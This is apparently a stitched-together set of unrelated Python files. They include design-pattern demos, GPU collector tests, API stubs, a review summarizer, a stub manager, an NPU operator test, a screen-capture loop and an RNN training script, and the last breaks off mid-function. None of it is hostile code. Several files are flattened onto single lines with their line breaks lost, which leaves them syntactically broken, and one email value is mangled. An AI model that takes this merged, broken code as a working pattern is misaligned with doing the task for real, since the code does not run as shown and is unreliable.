class Adaptee: def hello(self): print('hi') class Adapter: def __init__(self): self._adaptee = Adaptee() def hello(self): self._adaptee.hello() # region usage if __name__ == '__main__': Adapter().hello() # endregion
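# The adapter above wraps an interface that already matches its target; a more typical object
# adapter translates a differing adaptee method onto the expected one. A small sketch with
# illustrative names only (NorwegianGreeter/GreeterAdapter are not part of the code above):
class NorwegianGreeter:
    def hei(self):
        print('hei')


class GreeterAdapter:
    """Object adapter: exposes hello() by delegating to NorwegianGreeter.hei()."""

    def __init__(self):
        self._adaptee = NorwegianGreeter()

    def hello(self):
        self._adaptee.hei()


# region usage
if __name__ == '__main__':
    GreeterAdapter().hello()
# endregion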
from PIL import Image, ImageDraw
import itertools
import random


class generateFlag:
    def __init__(self, count, seed):
        self.seed = seed
        self.flag = Image.new("RGB", (3840, 2160), "white")
        self.draw = ImageDraw.Draw(self.flag)
        self.last_position = 0
        self.count = count
        self.color = open('colors.txt', 'r').read().split('\n')
        random.seed(self.seed)
        self.colors = [random.choice(self.color) for i in range(count)]
        print(f"Got colors for flag: {self.colors} using seed {self.seed}")

    def createStripes(self):
        # Start at 1: the old range(self.count + 1) spent iteration 0 drawing a zero-height
        # rectangle in self.colors[-1] before the real stripes overwrote it.
        for i in range(1, self.count + 1):
            y_position = round(2160 / self.count * i)
            color = self.colors[i - 1]
            self.draw.rectangle([0, self.last_position, 3840, y_position], fill=color)
            self.last_position = y_position

    def run(self):
        self.createStripes()
        self.flag.save("flag.png")
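# A minimal usage sketch for the class above, assuming a 'colors.txt' file with one colour per
# line (hex strings or names Pillow understands) sits in the working directory.
if __name__ == '__main__':
    flag = generateFlag(count=5, seed=42)
    flag.run()  # writes flag.png with five horizontal stripes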
# Copyright (c) Microsoft Corporation # All rights reserved. # # MIT License # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated # documentation files (the "Software"), to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and # to permit persons to whom the Software is furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING # BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. import os import sys import unittest import datetime import time import logging import base sys.path.append(os.path.abspath("../src/")) import collector import nvidia import docker_inspect from collector import ContainerCollector from collector import GpuCollector logger = logging.getLogger(__name__) class TestContainerCollector(base.TestBase): """ Test ContainerCollector in collecotr.py """ def test_parse_from_labels(self): inspect_result = docker_inspect.InspectResult( "openmindstudio", "trialslot_nnimain_d65bc5ac", "tuner", "0", "this_is_pod_name_val", "0,1,", 12345, "[email protected]", "platform", False, False, ) gpu_ids, labels = ContainerCollector.parse_from_labels( inspect_result, None) self.assertEqual(["0", "1"], gpu_ids) target_labels = { "username": "openmindstudio", "job_name": "trialslot_nnimain_d65bc5ac", "role_name": "tuner", "task_index": "0", "pod_name": "this_is_pod_name_val", "user_email": "[email protected]", "vc_name": "platform", "preemptible": "false", } self.assertEqual(target_labels, labels) def test_infer_service_name(self): self.assertIsNone( ContainerCollector.infer_service_name( "k8s_POD_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8" )) self.assertEqual( "alertmanager", ContainerCollector.infer_service_name( "k8s_alertmanager_alertmanager-7884c59f78-66r86_default_0a32e30a-f6ae-11e8-a62d-000d3ab25bb6_2" )) self.assertIsNone( ContainerCollector.infer_service_name( "k8s_kube-scheduler_kube-scheduler-10.151.40.4_kube-system_f1164d931979939cf0601155df9c748a_6" )) class TestDockerCollector(base.TestBase): """ Test DockerCollector in collector.py """ def assert_metrics(self, metrics): self.assertEqual(1, len(metrics)) self.assertEqual(1, len(metrics[0].samples)) sample = metrics[0].samples[0] self.assertEqual(1, len(sample[1])) # label keys self.assertEqual(1, sample[2]) # sample value def test_impl(self): _, c = collector.instantiate_collector("test_docker_collector1", 0.5, datetime.timedelta(seconds=1), collector.DockerCollector) self.assert_metrics(c.collect_impl()) def test_base_collector(self): """ actually setup DockerCollector thread, and test, since this is multi-thread test case, maybe sensitive to the system load """ ref = collector.make_collector("test_docker_collector2", 0.5, datetime.timedelta(seconds=10), collector.DockerCollector) metrics = None for i in range(20): metrics = ref.get(datetime.datetime.now()) if metrics is not None: break 
time.sleep(0.1) self.assert_metrics(metrics) class TestZombieCollector(base.TestBase): """ Test ZombieCollector in collector.py """ def setUp(self): # Because prometheus forbid same metric name, and we generate metric # in from name, we need to differentiate name using time. t = str(time.time()).replace(".", "_") decay_time = datetime.timedelta(seconds=1) _, self.collector = collector.instantiate_collector( "test_zombie_collector" + t, 0.5, decay_time, collector.ZombieCollector, collector.AtomicRef(decay_time), collector.AtomicRef(decay_time)) def test_update_zombie_count_type1(self): start = datetime.datetime.now() one_sec = datetime.timedelta(seconds=1) type1_recorder = self.collector.type1_zombies self.assertEqual( set(), self.collector.update_zombie_count_type1({"a", "b"}, start)) self.assertEqual(2, len(type1_recorder)) self.assertEqual( set(), self.collector.update_zombie_count_type1( {"a", "b"}, start + type1_recorder.decay_time - one_sec)) self.assertEqual(2, len(type1_recorder)) self.assertEqual({"a", "b"}, self.collector.update_zombie_count_type1( {"a", "b"}, start + type1_recorder.decay_time + one_sec)) self.assertEqual(2, len(type1_recorder)) self.assertEqual({"a"}, self.collector.update_zombie_count_type1( {"a"}, start + type1_recorder.decay_time + 2 * one_sec)) self.assertEqual(1, len(type1_recorder)) self.assertEqual( set(), self.collector.update_zombie_count_type1( {}, start + type1_recorder.decay_time + 3 * one_sec)) self.assertEqual(0, len(type1_recorder)) def test_update_zombie_count_type2(self): start = datetime.datetime.now() one_sec = datetime.timedelta(seconds=1) stats = { "43ffe701d883": { "name": "core-caffe2_resnet50_20181012040921.586-container_e03_1539312078880_0780_01_000002", "id": "43ffe701d883" }, "8de2f53e64cb": { "name": "container_e03_1539312078880_0780_01_000002", "id": "8de2f53e64cb" } } type2_recorder = self.collector.type2_zombies self.assertEqual(set(), self.collector.update_zombie_count_type2(stats, start)) stats.pop("8de2f53e64cb") self.assertEqual( set(), self.collector.update_zombie_count_type2(stats, start + one_sec)) self.assertEqual( set(), self.collector.update_zombie_count_type2( stats, start + type2_recorder.decay_time)) self.assertEqual({"43ffe701d883"}, self.collector.update_zombie_count_type2( stats, start + type2_recorder.decay_time + 2 * one_sec)) stats.pop("43ffe701d883") self.assertEqual( set(), self.collector.update_zombie_count_type2( stats, start + type2_recorder.decay_time + 3 * one_sec)) class TestGpuCollector(base.TestBase): """ Test GpuCollector in collecotr.py """ def make_pid_to_cid_fn(self, mapping): def fn(pid): if pid in mapping: return True, mapping[pid] return False, "" return fn def test_convert_to_metrics(self): # sample may not ordered, and can not assertEqual directly, so tear them apart gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0", "GPU-uuid0", 37.0) ]) zombie_info = {"abc", "def"} pid_to_cid_mapping = {33: "def", 22: "ghi"} # only 33 is zombie metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics target_core_utils = collector.gen_gpu_util_gauge() target_core_utils.add_metric(["0", "GPU-uuid0"], 20) self.assertEqual(target_core_utils, core_utils) target_mem_utils = collector.gen_gpu_mem_util_gauge() target_mem_utils.add_metric(["0", "GPU-uuid0"], 21) 
self.assertEqual(target_mem_utils, mem_utils) target_ecc_errors = collector.gen_gpu_ecc_counter() target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_single"], 0) target_ecc_errors.add_metric(["0", "GPU-uuid0", "volatile_double"], 0) target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_single"], 0) target_ecc_errors.add_metric(["0", "GPU-uuid0", "aggregated_double"], 0) self.assertEqual(target_ecc_errors, ecc_errors) target_mem_leak = collector.gen_gpu_memory_leak_counter() self.assertEqual(target_mem_leak, mem_leak) target_external_process = collector.gen_gpu_used_by_external_process_counter( ) target_external_process.add_metric(["0", "44"], 1) self.assertEqual(target_external_process, external_process) target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter( ) target_zombie_container.add_metric(["0", "def"], 1) self.assertEqual(target_zombie_container, zombie_container) target_gpu_temp = collector.gen_gpu_temperature_gauge() target_gpu_temp.add_metric(["0", "GPU-uuid0"], 37.0) self.assertEqual(target_gpu_temp, gpu_temp) # test minor 1 gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus( 30, 31, [55, 123], nvidia.EccError(volatile_single=2, volatile_double=3, aggregated_single=4, aggregated_double=5), "1", "GPU-uuid1", 24.0) ]) metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics target_core_utils = collector.gen_gpu_util_gauge() target_core_utils.add_metric(["1", "GPU-uuid1"], 30) self.assertEqual(target_core_utils, core_utils) target_mem_utils = collector.gen_gpu_mem_util_gauge() target_mem_utils.add_metric(["1", "GPU-uuid1"], 31) self.assertEqual(target_mem_utils, mem_utils) target_ecc_errors = collector.gen_gpu_ecc_counter() target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_single"], 2) target_ecc_errors.add_metric(["1", "GPU-uuid1", "volatile_double"], 3) target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_single"], 4) target_ecc_errors.add_metric(["1", "GPU-uuid1", "aggregated_double"], 5) self.assertEqual(target_ecc_errors, ecc_errors) target_mem_leak = collector.gen_gpu_memory_leak_counter() self.assertEqual(target_mem_leak, mem_leak) target_external_process = collector.gen_gpu_used_by_external_process_counter( ) target_external_process.add_metric(["1", "55"], 1) target_external_process.add_metric(["1", "123"], 1) self.assertEqual(target_external_process, external_process) target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter( ) self.assertEqual(target_zombie_container, zombie_container) target_gpu_temp = collector.gen_gpu_temperature_gauge() target_gpu_temp.add_metric(["1", "GPU-uuid1"], 24.0) self.assertEqual(target_gpu_temp, gpu_temp) # test minor 2 gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024, [], nvidia.EccError(), "2", "GPU-uuid2", 30.0) ]) metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics target_core_utils = collector.gen_gpu_util_gauge() target_core_utils.add_metric(["2", "GPU-uuid2"], 40) self.assertEqual(target_core_utils, core_utils) target_mem_utils = collector.gen_gpu_mem_util_gauge() target_mem_utils.add_metric(["2", "GPU-uuid2"], 20 * 1024 * 1024) 
self.assertEqual(target_mem_utils, mem_utils) target_ecc_errors = collector.gen_gpu_ecc_counter() target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_single"], 0) target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_double"], 0) target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_single"], 0) target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_double"], 0) self.assertEqual(target_ecc_errors, ecc_errors) target_mem_leak = collector.gen_gpu_memory_leak_counter() self.assertEqual(target_mem_leak, mem_leak) target_external_process = collector.gen_gpu_used_by_external_process_counter( ) self.assertEqual(target_external_process, external_process) target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter( ) self.assertEqual(target_zombie_container, zombie_container) target_gpu_temp = collector.gen_gpu_temperature_gauge() target_gpu_temp.add_metric(["2", "GPU-uuid2"], 30.0) self.assertEqual(target_gpu_temp, gpu_temp) # test memory leak gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024 + 1, [], nvidia.EccError(), "3", "GPU-uuid3", 30.0) ]) metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics target_mem_leak = collector.gen_gpu_memory_leak_counter() target_mem_leak.add_metric(["3", "GPU-uuid3"], 1) self.assertEqual(target_mem_leak, mem_leak) def test_convert_to_metrics_with_no_zombie_info_BUGFIX(self): gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0", "GPU-uuid0", 40.0) ]) # zombie_info is empty should also have external process metric zombie_info = [] pid_to_cid_mapping = { 33: "def", 22: "ghi" } # only 44 is external process metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics self.assertEqual(0, len(zombie_container.samples)) self.assertEqual(1, len(external_process.samples)) self.assertEqual("0", external_process.samples[0].labels["minor_number"]) self.assertEqual("44", external_process.samples[0].labels["pid"]) # zombie_info is None should also have external process metric zombie_info = None metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics self.assertEqual(0, len(zombie_container.samples)) self.assertEqual(1, len(external_process.samples)) self.assertEqual("0", external_process.samples[0].labels["minor_number"]) self.assertEqual("44", external_process.samples[0].labels["pid"]) def test_convert_to_metrics_with_real_id_BUGFIX(self): gpu_info = nvidia.construct_gpu_info([ nvidia.NvidiaGpuStatus(20, 21, [22], nvidia.EccError(), "0", "GPU-uuid0", 50.0) ]) # zombie_info is empty should also have external process metric zombie_info = {"ce5de12d6275"} pid_to_cid_mapping = { 22: "ce5de12d6275dc05c9ec5b7f58484f075f4775d8f54f6a4be3dc1439344df356" } metrics = GpuCollector.convert_to_metrics( gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping), 20 * 1024) core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics self.assertEqual(1, len(zombie_container.samples)) 
self.assertEqual("0", zombie_container.samples[0].labels["minor_number"]) self.assertEqual("ce5de12d6275", zombie_container.samples[0].labels["container_id"]) class TestAtomicRef(base.TestBase): """ Test AtomicRef in collecotr.py """ def test_expiration(self): ref = collector.AtomicRef(datetime.timedelta(seconds=10)) now = datetime.datetime.now() delta = datetime.timedelta(seconds=1) ref.set(1, now) self.assertEquals(1, ref.get(now)) self.assertEquals(1, ref.get(now - delta)) self.assertEquals(1, ref.get(now + delta)) self.assertEquals(1, ref.get(now + delta * 10)) self.assertEquals(None, ref.get(now + delta * 11)) self.assertEquals(1, ref.get(now + delta * 10)) ref.set(2, now + delta) self.assertEquals(2, ref.get(now)) self.assertEquals(2, ref.get(now + delta * 10)) self.assertEquals(2, ref.get(now + delta * 11)) self.assertEquals(None, ref.get(now + delta * 12)) if __name__ == '__main__': unittest.main()
import connexion import six from mcenter_server_api.models.ml_app_pattern import MLAppPattern # noqa: E501 from mcenter_server_api import util def onboarding_ml_app_patterns_get(): # noqa: E501 """Get list of all MLApp patterns # noqa: E501 :rtype: List[MLAppPattern] """ return 'do some magic!' def onboarding_ml_app_patterns_ml_app_pattern_id_delete(ml_app_pattern_id): # noqa: E501 """Delete an existing MLApp pattern # noqa: E501 :param ml_app_pattern_id: MLApp pattern identifier :type ml_app_pattern_id: str :rtype: None """ return 'do some magic!' def onboarding_ml_app_patterns_ml_app_pattern_id_get(ml_app_pattern_id): # noqa: E501 """Get specific MLApp pattern # noqa: E501 :param ml_app_pattern_id: MLApp pattern identifier :type ml_app_pattern_id: str :rtype: MLAppPattern """ return 'do some magic!' def onboarding_ml_app_patterns_ml_app_pattern_id_put(ml_app_pattern_id, ml_app_pattern): # noqa: E501 """Update an existing MLApp pattern # noqa: E501 :param ml_app_pattern_id: MLApp pattern identifier :type ml_app_pattern_id: str :param ml_app_pattern: MLApp pattern detail configuration :type ml_app_pattern: dict | bytes :rtype: MLAppPattern """ if connexion.request.is_json: ml_app_pattern = MLAppPattern.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def onboarding_ml_app_patterns_post(ml_app_pattern): # noqa: E501 """Create a new MLApp pattern # noqa: E501 :param ml_app_pattern: MLApp pattern detail description :type ml_app_pattern: dict | bytes :rtype: MLAppPattern """ if connexion.request.is_json: ml_app_pattern = MLAppPattern.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!'
import requests

# ':moedas' is a placeholder route parameter; fill it with the currency pairs you want to query.
req = requests.get('https://economia.awesomeapi.com.br/json/last/:moedas')
# req = req.json()  # the Response object itself carries the JSON payload, not requests.api.request
print(req)
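# A sketch of the same call with the placeholder filled in. 'USD-BRL' is only an example pair,
# and the field names assume AwesomeAPI's documented response shape ({"USDBRL": {"bid": ...}}).
import requests

resp = requests.get('https://economia.awesomeapi.com.br/json/last/USD-BRL')
data = resp.json()
print(data.get('USDBRL', {}).get('bid'))  # last bid price, returned as a string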
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 GEO Secretariat.
#
# geo-knowledge-hub is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.

from flask import Blueprint

from . import views


def init_bp(app):
    bp = Blueprint("ageo_deposit_bp", __name__, template_folder="theme/templates")

    # registration
    bp.add_url_rule("/uploads", "ageo_deposit_search", views.geo_deposit_search)
    bp.add_url_rule("/uploads/new", "ageo_deposit_create", views.geo_deposit_create)
    bp.add_url_rule("/uploads/<pid_value>", "ageo_deposit_edit", views.geo_deposit_edit)
    bp.add_url_rule("/records/<pid_value>", "ageo_record_detail", views.geo_record_detail)

    app.register_blueprint(bp)


# The trailing comma makes this a tuple rather than a bare string.
__all__ = ("init_bp",)
from nltk.corpus import stopwords from nltk import sent_tokenize, word_tokenize import heapq from preprocessor import PreProcessor class ReviewSummarizer: def generate_summary(self, review): pp = PreProcessor() formatted_text = pp.preprocess_review(review, True) sentences = sent_tokenize(review) word_frequencies = {} for word in word_tokenize(formatted_text): stop_words = set(stopwords.words('english')) if word not in stop_words: if word not in word_frequencies.keys(): word_frequencies[word] = 1 else: word_frequencies[word] += 1 maximum_frequency = max(word_frequencies.values()) for word in word_frequencies.keys(): word_frequencies[word] = (word_frequencies[word] / maximum_frequency) sentence_scores = {} for sent in sentences: for word in word_tokenize(sent.lower()): if word in word_frequencies.keys(): if len(sent.split(' ')) < 80: if sent not in sentence_scores.keys(): sentence_scores[sent] = word_frequencies[word] else: sentence_scores[sent] += word_frequencies[word] sent_summary = heapq.nlargest(2, sentence_scores, key=sentence_scores.get) summarized = ' '.join(sent_summary) return summarized def summarized_reviews(self, aspect_details): for aspect, detail in aspect_details.items(): for rev in detail.review_list.keys(): summarized_review = self.generate_summary(rev) rating = detail.review_list[rev] detail.review_summary[summarized_review] = rating return aspect_details
from __future__ import annotations import json from pathlib import Path from typing import Any, Iterator, NamedTuple, Sequence import astroid from ._contract import Category EXTENSION = '.json' ROOT = Path(__file__).parent / 'stubs' CPYTHON_ROOT = ROOT / 'cpython' class StubFile: __slots__ = ('path', '_content') path: Path _content: dict[str, dict[str, Any]] def __init__(self, path: Path) -> None: self.path = path self._content = dict() def load(self) -> None: with self.path.open(encoding='utf8') as stream: self._content = json.load(stream) def dump(self) -> None: if not self._content: return with self.path.open(mode='w', encoding='utf8') as stream: json.dump(obj=self._content, fp=stream, indent=2, sort_keys=True) def add(self, func: str, contract: Category, value: str) -> None: if contract not in (Category.RAISES, Category.HAS): raise ValueError('unsupported contract') contracts = self._content.setdefault(func, dict()) values = contracts.setdefault(contract.value, []) if value in values: return values.append(value) values.sort() def get(self, func: str, contract: Category) -> frozenset[str]: if contract not in (Category.RAISES, Category.HAS): raise ValueError('unsupported contract') values = self._content.get(func, {}).get(contract.value, []) return frozenset(values) class StubsManager: __slots__ = ('paths', '_modules') _modules: dict[str, StubFile] paths: tuple[Path, ...] default_paths = (ROOT, CPYTHON_ROOT) def __init__(self, paths: Sequence[Path] | None = None) -> None: self._modules = dict() if paths is None: self.paths = self.default_paths else: self.paths = tuple(paths) def read(self, *, path: Path, module_name: str | None = None) -> StubFile: if path.suffix == '.py': path = path.with_suffix(EXTENSION) if path.suffix != EXTENSION: raise ValueError(f'invalid stub file extension: *{path.suffix}') if module_name is None: module_name = self._get_module_name(path=path) if module_name not in self._modules: stub = StubFile(path=path) stub.load() self._modules[module_name] = stub return self._modules[module_name] @staticmethod def _get_module_name(path: Path) -> str: path = path.resolve() # walk up by the tree as pytest does if not (path.parent / '__init__.py').exists(): return path.stem for parent in path.parents: if not (parent / '__init__.py').exists(): parts = path.relative_to(parent).with_suffix('').parts return '.'.join(parts) raise RuntimeError('unreachable: __init__.py files up to root?') # pragma: no cover def get(self, module_name: str) -> StubFile | None: # cached stub = self._modules.get(module_name) if stub is not None: return stub # in the root for root in self.paths: path = root / (module_name + EXTENSION) if path.exists(): return self.read(path=path, module_name=module_name) path = root.joinpath(*module_name.split('.')).with_suffix(EXTENSION) if path.exists(): return self.read(path=path, module_name=module_name) return None def create(self, path: Path) -> StubFile: if path.suffix == '.py': path = path.with_suffix(EXTENSION) module_name = self._get_module_name(path=path) # if the stub for file is somewhere in the paths, use this instead. 
stub = self.get(module_name=module_name) if stub is not None: return stub # create new stub and load it from disk if the file exists stub = StubFile(path=path) if path.exists(): stub.load() self._modules[module_name] = stub return stub class PseudoFunc(NamedTuple): name: str body: list def _get_funcs(*, path: Path) -> Iterator[PseudoFunc]: text = path.read_text() tree = astroid.parse(code=text, path=str(path)) for expr in tree.body: yield from _get_funcs_from_expr(expr=expr) def _get_funcs_from_expr(expr, prefix: str = '') -> Iterator[PseudoFunc]: name = getattr(expr, 'name', '') if prefix: name = prefix + '.' + name # functions if type(expr) is astroid.FunctionDef: yield PseudoFunc(name=name, body=expr.body) if type(expr) is astroid.AsyncFunctionDef: yield PseudoFunc(name=name, body=expr.body) # methods if type(expr) is astroid.ClassDef: for subexpr in expr.body: yield from _get_funcs_from_expr(expr=subexpr, prefix=name) def generate_stub(*, path: Path, stubs: StubsManager | None = None) -> Path: from ._extractors import get_exceptions, get_markers if path.suffix != '.py': raise ValueError(f'invalid Python file extension: *{path.suffix}') if stubs is None: stubs = StubsManager() stub = stubs.create(path=path) for func in _get_funcs(path=path): for token in get_exceptions(body=func.body, stubs=stubs): value = token.value if isinstance(value, type): value = value.__name__ stub.add(func=func.name, contract=Category.RAISES, value=str(value)) for token in get_markers(body=func.body, stubs=stubs): assert token.marker is not None stub.add(func=func.name, contract=Category.HAS, value=token.marker) stub.dump() return stub.path
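# A minimal usage sketch for the stub machinery above. 'example.py' and 'some_function' are
# placeholders, not names from this package; the .py file must exist on disk for generate_stub()
# to parse it, and the .json stub is written next to it only when contracts are found.
from pathlib import Path

stubs = StubsManager()
stub_path = generate_stub(path=Path('example.py'), stubs=stubs)
stub = stubs.read(path=stub_path)
print(stub.get(func='some_function', contract=Category.RAISES))  # frozenset of exception names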
# Copyright (c) 2020, Huawei Technologies.All rights reserved. # # Licensed under the BSD 3-Clause License (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://opensource.org/licenses/BSD-3-Clause # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import torch import numpy as np import sys import copy from common_utils import TestCase, run_tests from common_device_type import dtypes, instantiate_device_type_tests from util_test import create_common_tensor class TestReciprocal(TestCase): def cpu_op_exec(self, input): output = torch.reciprocal(input) output = output.numpy() return output def npu_op_extc(self, input): output = torch.reciprocal(input) output = output.to("cpu") output = output.numpy() return output def test_reciprocal_common_shape_format(self, device): shape_format = [ [[np.float32, -1, (2, 2)]], [[np.float32, -1, (2, 2, 2)]], [[np.float32, -1, (2, 2, 2,5)]] ] for item in shape_format: cpu_input, npu_input = create_common_tensor(item[0], 1, 10) cpu_output = self.cpu_op_exec(cpu_input) npu_output = self.npu_op_extc(npu_input) self.assertRtolEqual(cpu_output, npu_output) def test_reciprocal_float16_shape_format(self, device): def cpu_op_exec_fp16(input): input = input.to(torch.float32) output = torch.reciprocal(input) output = output.numpy() output = output.astype(np.float16) return output shape_format = [ [[np.float16, -1, (2, 2)]], [[np.float16, -1, (2, 3, 5)]] ] for item in shape_format: cpu_input, npu_input = create_common_tensor(item[0], 1, 10) cpu_output = cpu_op_exec_fp16(cpu_input) npu_output = self.npu_op_extc(npu_input) self.assertRtolEqual(cpu_output, npu_output) instantiate_device_type_tests(TestReciprocal, globals(), except_for='cpu') if __name__ == "__main__": run_tests()
import time

import numpy as np
from cv2 import cv2
from mss import mss
from PIL import Image  # only needed by the commented-out snippet at the bottom

init_time = last_time = time.time()
count = 0
monitor = {'top': 40, 'left': 0, 'width': 800, 'height': 450}

# Create the mss instance once instead of re-entering the context manager on every iteration.
with mss() as sct:
    while 1:
        img = np.array(sct.grab(monitor))
        print('Loop took {} seconds'.format(time.time() - last_time))
        count += 1
        last_time = time.time()
        cv2.imshow('test', img)
        if cv2.waitKey(25) & 0xFF == ord('q'):
            cv2.destroyAllWindows()
            break

print('each loop took avg {} seconds'.format((last_time - init_time) / count))

# A faster way using mss (the loop took about 0.06 seconds on my notebook instead of 0.10 seconds using ImageGrab)
# mss: 16.7fps (capture BGR stream)
# PIL.ImageGrab: 10.0fps (capture RGB stream)

# The snippet below was suggested as an even faster way, but it raises an error on my notebook,
# likely because get_pixels()/sct.image only exist in older mss releases:
# mon = {'top': 160, 'left': 160, 'width': 200, 'height': 200}
# with mss() as sct:
#     while 1:
#         sct.get_pixels(mon)
#         img = Image.frombytes('RGB', (sct.width, sct.height), sct.image)
#         cv2.imshow('test', np.array(img))
#         if cv2.waitKey(25) & 0xFF == ord('q'):
#             cv2.destroyAllWindows()
#             break
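# A sketch of the commented-out snippet above ported to the current mss API: grab() replaces the
# removed get_pixels(), and the returned ScreenShot exposes .rgb and .size for the PIL conversion.
# Assumes mss >= 3.0 and Pillow; note that cv2.imshow expects BGR, so an RGB image will display
# with swapped channels unless converted first.
import numpy as np
import cv2
from mss import mss
from PIL import Image

mon = {'top': 160, 'left': 160, 'width': 200, 'height': 200}
with mss() as sct:
    while 1:
        shot = sct.grab(mon)
        img = Image.frombytes('RGB', shot.size, shot.rgb)
        cv2.imshow('test', np.array(img))
        if cv2.waitKey(25) & 0xFF == ord('q'):
            cv2.destroyAllWindows()
            break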
from tqdm import tqdm import numpy as np import random import itertools import json import time import torch from torch.autograd import Variable from torch.utils.data import DataLoader from rnn.data import DataIterator from rnn.model import EncoderRNN, DecoderRNN, Attention def train_model(w2v_model, epochs, output_size, datadir, savedir, cotraining_ratio=None, pretrain_epochs=None, pretraining_parameters=None, test_size=None, USE_CUDA=False): if pretrain_epochs and pretraining_parameters: raise ValueError('Both pretrain_epochs and pretraining_parameter arguments are given; ' 'at least one of them should be falsy.') print('Current time: {}'.format(time.strftime('%l:%M%p | %b %d'))) print('Loading data...', flush=True) # Load data data = {} for name in ('train', 'valid', 'test'): data[name] = DataIterator(dirname=datadir, w2v_model=w2v_model, dataset_name=name) if test_size: print("Loading data chunks of {}".format(test_size), flush=True) train_data_subset = list(itertools.islice(data['train'], test_size)) valid_data_subset = list(itertools.islice(data['valid'], test_size)) test_data_subset = list(itertools.islice(data['test'], test_size)) train_data = DataLoader(train_data_subset, num_workers=4, shuffle=True) valid_data = DataLoader(valid_data_subset, num_workers=4, shuffle=False) test_data = DataLoader(test_data_subset, num_workers=4, shuffle=False) else: train_data = DataLoader(list(data['train']), num_workers=4, shuffle=True) valid_data = DataLoader(list(data['valid']), num_workers=4, shuffle=False) test_data = DataLoader(list(data['test']), num_workers=4, shuffle=False) print('Finished loading data.') print('Subset lengths: {}, {}, {}'.format(len(train_data), len(valid_data), len(test_data)), flush=True) # Initialize model & training parameters teacher_forcing_ratio = 0.5 embedding_size = 300 rnn_hidden_size = 500 attn_hidden_size = 500 dropout_p = .3 lr = 1e-3 encoder = EncoderRNN(embedding_size, rnn_hidden_size, dropout_p=dropout_p) attn = Attention(rnn_hidden_size, attn_hidden_size, output_size) decoder = DecoderRNN(embedding_size + output_size, rnn_hidden_size, dropout_p=dropout_p) # Define loss criterion criterion = torch.nn.NLLLoss() if USE_CUDA: encoder = encoder.cuda() decoder = decoder.cuda() attn = attn.cuda() loss_means = [] accuracy_means = [] loss_save_interval = 1000 if pretrain_epochs: # Use separately initialized optimizers for pretraining encoder_optim = torch.optim.Adam(encoder.parameters(), lr=lr) decoder_optim = torch.optim.Adam(decoder.parameters(), lr=lr) attn_optim = torch.optim.Adam(attn.parameters(), lr=lr) optims = [encoder_optim, decoder_optim, attn_optim] for epoch in range(pretrain_epochs): print('\nPretraining epoch {}'.format(epoch + 1)) print('Current time: {}'.format(time.strftime('%l:%M%p | %b %d'))) # Set model to train mode encoder.train() decoder.train() attn.train() # Bookkeeping losses = [] loss_sum 